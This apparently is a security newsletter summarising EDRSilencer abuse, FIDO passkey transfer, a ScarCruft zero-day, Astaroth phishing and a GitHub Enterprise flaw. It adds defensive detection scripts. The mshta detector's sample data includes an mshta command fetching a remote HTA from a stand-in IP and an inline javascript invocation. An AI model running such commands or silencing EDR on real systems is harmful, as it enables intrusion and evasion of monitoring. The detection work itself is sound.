WME Security Briefing 24 October 2024

WME Cybersecurity Briefings No. 031

Hackers Exploit EDRSilencer to Evade Security Detection

Overview

Threat actors have been observed abusing the EDRSilencer tool to bypass endpoint detection and response (EDR) solutions and carry out attacks against targeted organizations. EDRSilencer is an open-source utility created to selectively disable EDR processes; by exploiting it, attackers can operate stealthily and avoid detection of their malicious actions. It draws inspiration from the NightHawk FireBlock tool and leverages the Windows Filtering Platform (WFP) to perform its malicious activity. In short, it blocks outbound communications from EDR software.

Impact

With EDRSilencer exploited, attackers can bypass the cyber defense mechanisms provided by top cybersecurity vendors offering EDR products. The manoeuvre allows them to deactivate processes from popular EDR solutions such as those from Microsoft, Trellix, SentinelOne and Palo Alto Networks.

With this tool in place, attackers can automatically identify the outbound network traffic of EDR processes using additional code and then block the upload of telemetry data to security consoles.

As a result, malware and other threats go unnoticed, which gives an attempted attack a greater chance of success without any security intervention. The tool also leverages WFP to create persistent filters that stop EDR solutions from sending out alerts, further obscuring malicious activity.

Exploiting tools like EDRSilencer is part of a growing trend among ransomware groups, which are increasingly using advanced EDR-killing tools such as AuKill, EDRKillShifter and GhostDriver to maintain persistence in compromised systems.

Recommendation

To defend against threats using EDRSilencer and related tools, organizations should:

  • Keep EDR solutions up to date and apply security patches regularly to prevent exploitation of known vulnerabilities.
  • Be vigilant for suspicious activity; keep an eye out for unexpected or unusual network traffic.
  • Adopt layered security strategies that offer capability beyond EDR software, such as network-based intrusion detection systems (IDS) and anomaly detection solutions.
  • Adopt a dedicated endpoint security solution that is able to detect and remove unauthorized modifications of system-level components (in this case, WFP filters).
  • Security teams should refine and iterate their defenses as threats change to keep pace with evolving tactics.
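To act on the last two recommendations, the following added example (not from the original briefing or from any EDR vendor) audits an export of WFP filters and flags block filters on the outbound-connection layers whose application-ID condition names an EDR binary, which is the pattern the Impact section describes. It assumes the element layout of a "netsh wfp show filters" XML export and uses a constructed list of EDR executable names; both are assumptions to check against your own environment.

```python
import xml.etree.ElementTree as ET

# Executable names an EDR-silencing tool would single out. Constructed list for this
# example; replace it with the binaries your own EDR agent actually runs.
EDR_BINARIES = {"mssense.exe", "msmpeng.exe", "sentinelagent.exe", "cyserver.exe"}
# Outbound-connection layers: a block filter here cuts the agent off from its cloud
# console while the process keeps running, so nothing crashes and nothing is logged.
OUTBOUND_LAYERS = {"FWPM_LAYER_ALE_AUTH_CONNECT_V4", "FWPM_LAYER_ALE_AUTH_CONNECT_V6"}

def find_edr_block_filters(xml_text, edr_binaries=EDR_BINARIES):
    """Return block filters whose application-ID condition names an EDR binary.
    Assumes the element layout of a 'netsh wfp show filters' export (assumption:
    <filters><item>...</item></filters>); verify the names against a real export."""
    findings = []
    for flt in ET.fromstring(xml_text).iter("item"):
        layer = flt.findtext("layerKey")  # nested condition <item>s have none
        if layer not in OUTBOUND_LAYERS or flt.findtext("action/type") != "FWP_ACTION_BLOCK":
            continue
        for cond in flt.iterfind("filterCondition/item"):
            if cond.findtext("fieldKey") != "FWPM_CONDITION_ALE_APP_ID":
                continue
            app = (cond.findtext("conditionValue/byteBlob/asString") or "").lower()
            if app.rsplit("\\", 1)[-1] in edr_binaries:
                findings.append({"name": flt.findtext("displayData/name"), "layer": layer, "app": app})
    return findings

# Constructed sample export: one filter silencing the Defender for Endpoint sensor
# and one unrelated permit filter that must not be flagged. Filter names are made up.
SAMPLE_FILTERS = """<filters>
  <item>
    <displayData><name>Sample Block Filter</name></displayData>
    <layerKey>FWPM_LAYER_ALE_AUTH_CONNECT_V4</layerKey>
    <filterCondition><item><fieldKey>FWPM_CONDITION_ALE_APP_ID</fieldKey>
      <conditionValue><byteBlob><asString>\\device\\harddiskvolume3\\program files\\windows defender advanced threat protection\\mssense.exe</asString></byteBlob></conditionValue>
    </item></filterCondition>
    <action><type>FWP_ACTION_BLOCK</type></action>
  </item>
  <item>
    <displayData><name>Allow Browser</name></displayData>
    <layerKey>FWPM_LAYER_ALE_AUTH_CONNECT_V4</layerKey>
    <filterCondition><item><fieldKey>FWPM_CONDITION_ALE_APP_ID</fieldKey>
      <conditionValue><byteBlob><asString>\\device\\harddiskvolume3\\program files\\browser\\browser.exe</asString></byteBlob></conditionValue>
    </item></filterCondition>
    <action><type>FWP_ACTION_PERMIT</type></action>
  </item>
</filters>"""

if __name__ == "__main__":
    for f in find_edr_block_filters(SAMPLE_FILTERS):
        print(f"suspicious WFP block filter '{f['name']}' on {f['layer']} -> {f['app']}")
```

Run it against a real export and alert on any finding; Windows Security event 5447 (a Windows Filtering Platform filter has been changed) gives the corresponding real-time signal when filtering platform policy change auditing is enabled.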

FIDO Alliance Proposes New Standard to Streamline Passkey Transfers Across Platforms

Overview

The FIDO Alliance is developing a protocol designed to facilitate the transfer of passkeys and credentials from one platform to another, simplifying multi-platform interaction among providers.

The FIDO Alliance published a draft specification for a secure credential exchange protocol. The draft follows the collaboration of Credential Provider Special Interest Group (SIG) members, including Apple, Google and Microsoft. This move addresses the growing demand for seamless credential management as over 12 billion online accounts are now being accessed via passwordless sign-in solutions.

Impact

The current challenge with passkeys is their limited portability. While resistant to phishing, passkeys are typically tied to a specific operating system or password manager. This makes it difficult to transfer credentials between platforms when users switch devices, so users have to recreate passkeys on new devices.

The draft specification defines two components: the Credential Exchange Protocol (CXP) and the Credential Exchange Format (CXF).

These standards will provide a unified method for transferring credentials like passkeys between providers without compromising security. They ensure credential transfers are encrypted and secure by default. With companies like Amazon already supporting passkeys for over 175 million accounts, this initiative seeks to accelerate passkey adoption by removing existing barriers to credential management across platforms.

Recommendation

Leaders and practitioners are encouraged to monitor the Credential Exchange Protocol and Credential Exchange Format as these standards mature towards formal completion. Adopting them when they become available might simplify credential management across different platforms and devices, combining security with a better user experience.

Additionally, users can continue to rely on passkeys as a security factor that protects against phishing and password reuse. Expect additional details as the FIDO Alliance finalizes the specifications, and remember to update your credential management systems as the protocols change so that credential transfers stay secure and seamless.

ScarCruft Exploits Windows Zero-Day to Deliver RokRAT Malware

Overview

Security researchers discovered a zero-day exploit used by ScarCruft (also known as APT37, TA-RedAnt and InkySquid). This group is part of the North Korean government and has a track record of malicious activity.

The group distributed the RokRAT malware family by exploiting a now-patched Windows flaw, CVE-2024-38178. This Scripting Engine vulnerability could be exploited to execute remote code through the Edge browser in Internet Explorer Mode.

Researchers at the AhnLab Security Intelligence Center (ASEC) and the National Cyber Security Center of the Republic of Korea (NCSC) detected this vulnerability. The campaign exploiting it has been named “Operation Code on Toast.”

Impact

The CVE-2024-38178 vulnerability, with a CVSS score of 7.5, posed a serious risk. It enabled remote actors to compromise devices if users clicked on malicious URLs. The flaw caused memory corruption in the Scripting Engine used by Internet Explorer components. Ultimately, it allowed attackers to abuse toast notifications (a common feature of free software distributed in South Korea) to deliver the exploit.

If exploited, this vulnerability may lead to the deployment of RokRAT malware on affected machines. The malware grants attackers remote access and control, allowing them to gather sensitive data and execute further commands. Notably, RokRAT used cloud services like Dropbox and Yandex Cloud for its command-and-control (C2), which makes its traffic much harder to distinguish from regular traffic patterns.

Recommendation

Users and organizations should apply Microsoft's patches, especially those released in the last quarter of 2024, to resolve CVE-2024-38178.

To mitigate risks:

  • Update to the latest versions of Windows operating systems and all applications.
  • Avoid clicking on suspicious links, and never follow links from unknown sources.
  • Regularly watch for odd behaviour on your network, especially unexpected outbound communications.

Astaroth Banking Malware Resurfaces in Brazil via Spear-Phishing Campaign

Overview

A recently identified spear-phishing campaign in Brazil has revived the Brazilian banking malware Astaroth. This malware, also called Guildma, uses obfuscated JavaScript to bypass traditional security defenses. The phishing emails pose as official tax documents, capitalizing on the urgency of personal income tax filings to dupe users into downloading malicious files.

Impact

Astaroth attacks, which are likely to evolve further, pose a severe long-term danger through eroded consumer confidence and escalating remediation costs. The malware can steal sensitive financial data and cause widespread damage. In this campaign, attackers use ZIP attachments that contain malicious Windows shortcut (LNK) files.

These shortcuts abuse the legitimate mshta.exe utility to run hidden JavaScript commands, which connect to the attacker’s command-and-control (C2) server. The outcome is a major security breach that compromises the target systems, disrupts business functions and carries the potential for regulatory fines.
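The LNK-to-mshta.exe chain above is visible in endpoint process-creation telemetry. The following added example (not from the original briefing) classifies constructed process-creation records: it flags mshta.exe executing an inline script protocol or fetching a remote URL, notes an Explorer parent as consistent with a double-clicked shortcut, and leaves a locally opened .hta file alone. The pipe-separated key=value record format and the field names are assumptions made for this example.

```python
import re
# Indicators for the chain described above: mshta.exe handed an inline script
# protocol or a remote URL instead of a local .hta file.
SCRIPT_PROTOCOL = re.compile(r"\b(javascript|vbscript|about):", re.I)
REMOTE_URL = re.compile(r"\bhttps?://", re.I)

# Constructed process-creation records in a flat key=value form (Sysmon Event ID 1
# style). The pipe-separated layout and field names are assumptions for this
# example; 203.0.113.10 is a documentation-range address, not a real C2 server.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=mshta.exe javascript:document.write('constructed sample');close()",
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Tools\\inventory.hta\"",
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=mshta http://203.0.113.10/docs/recibo.hta",
]

def parse_event(line):
    """Split one record into a field dict; values may themselves contain '='."""
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the reasons an event looks like mshta.exe abuse; [] if unrelated or benign."""
    if basename(ev["Image"]) != "mshta.exe":
        return []
    cmd, reasons = ev["CommandLine"], []
    if SCRIPT_PROTOCOL.search(cmd):
        reasons.append("inline script protocol passed to mshta.exe")
    if REMOTE_URL.search(cmd):
        reasons.append("mshta.exe fetching a remote HTA/script")
    # An Explorer parent alone is normal (users open .hta files); it only adds context.
    if reasons and basename(ev["ParentImage"]) == "explorer.exe":
        reasons.append("launched from Explorer, consistent with a double-clicked LNK")
    return reasons

def detect(lines):
    """Return (command line, reasons) for every record that classify() flags."""
    hits = []
    for ev in map(parse_event, lines):
        if reasons := classify(ev):
            hits.append((ev["CommandLine"], reasons))
    return hits

if __name__ == "__main__":
    for cmd, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT: {cmd}\n  - " + "\n  - ".join(reasons))
```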

Recommendation

To protect against Astaroth malware:

  • Establish a strong password policy to prevent unauthorised access.
  • Add a layer of security with multi-factor authentication (MFA).
  • Update security solutions and software to mitigate known vulnerabilities.
  • Apply the principle of least privilege (PoLP): restrict access to essential systems and remove needless attack surface.

Phishing campaigns like this one can steal personally identifiable information (PII). Organizations need to be especially vigilant at this time of year, when tax-related documents are circulating and lures that imitate them are easy to miss. In addition, proper email security filtering and monitoring systems can help discover and prevent such campaigns.

Critical GitHub Enterprise Server Flaw Allows Unauthorized Access to Instances

Overview

GitHub has released essential security updates for GitHub Enterprise Server (GHES). The patches include a fix for a critical vulnerability that could be exploited to gain unauthorized access to GHES instances.

CVE-2024-9487 has a CVSS score of 9.5. The flaw affects GitHub’s handling of SAML single sign-on (SSO) authentication and applies when the optional encrypted assertions feature is in use. Because cryptographic signatures are not verified properly, an attacker can bypass SAML SSO authentication and gain access to the instance.

Impact

If exploited, CVE-2024-9487 could allow attackers to:

  • Bypass authentication protocols.
  • Provision users without authorization.
  • Gain unauthorized access to sensitive data on GitHub.

GitHub has categorized the flaw as a regression introduced during the remediation of a previous vulnerability, CVE-2024-4985.

In addition, GitHub addressed two other vulnerabilities:

  • CVE-2024-9539, an information disclosure vulnerability.
  • A sensitive data exposure flaw in the management console’s HTML forms (no CVE assigned).

All of these vulnerabilities have been addressed in GHES versions 3.14.2, 3.13.5, 3.12.10 and 3.11.16.

Recommendation

To protect against these vulnerabilities, it is highly recommended that any self-hosted GitHub Enterprise Server instance be upgraded immediately to the newest GHES versions, 3.14.2 and 3.13.5. In addition, review the SAML single sign-on settings to ensure encryption is configured properly.


Matt Tinney

Professional IT executive & business leader having decades of experience with Microsoft technologies delivering modern-day cloud & security solutions.
